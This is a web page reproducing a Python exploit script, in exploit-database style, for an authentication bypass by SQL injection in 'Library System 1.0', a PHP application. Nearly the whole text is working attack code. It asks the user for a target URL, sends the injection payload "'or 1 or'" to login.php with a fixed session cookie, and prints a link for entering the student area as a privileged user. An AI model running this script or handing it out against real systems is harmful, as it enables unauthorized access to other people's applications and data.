扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection # Exploit Author: Himanshu Shukla # Date: 2021-01-21 # Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip # Version: 1.0 # Tested On: Windows 10 + XAMPP 7.4.4 # Description: Library System 1.0 - Authentication Bypass Via SQL Injection #STEP 1 : Run The Exploit With This Command : python3 exploit.py #STEP 2 : Input the URL of Vulnable Application.For Example: http://10.9.67.23/libsystem/ #STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser. #Note - You Will Only Be Able To Access The Student Area as a Privileged User. import requests YELLOW ='\033[33m' # Yellow Text GREEN ='\033[32m' # Green Text RED ='\033[31m' # Red Text RESET = '\033[m' # reset to the defaults print(YELLOW+'________ ____ ', RESET) print(YELLOW+'___| |_ ___ / / ___|| |__ __ ___| |/ _ \____', RESET) print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _<code> |/ _</code> | | | \ \ /\ / /", RESET) print(YELLOW+'|__/ || (__ / /___) | | | | (_| | (_| | |_| |\ VV / ', RESET) print(YELLOW+' \___|\__\___/_/|____/|_| |_|\__,_|\__,_|\___/\_/\_/', RESET) print(YELLOW+" ", RESET) print('********************************************************') print('**LIBRARY SYSTEM 1.0**') print('** AUTHENTICATION BYPASS USING SQL INJECTION**') print('********************************************************') print('Author - Himanshu Shukla') #Create a new session s = requests.Session() #Set Cookie cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'} LINK=input("Enter URL of The Vulnarable Application : ") #Authentication Bypass print("[*]Attempting Authentication Bypass...") values = {"student":"'or 1 or'","login":""} r=s.post(LINK+'login.php', data=values, cookies=cookies) r=s.post(LINK+'login.php', data=values, cookies=cookies) #Check if Authentication was bypassed or not. logged_in = True if not("Student not found" in r.text) else False l=logged_in if l: print(GREEN+"[+]Authentication Bypass Successful!", RESET) print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET) else: print(RED+"[-]Failed To Authenticate!", RESET) |
体验盒子
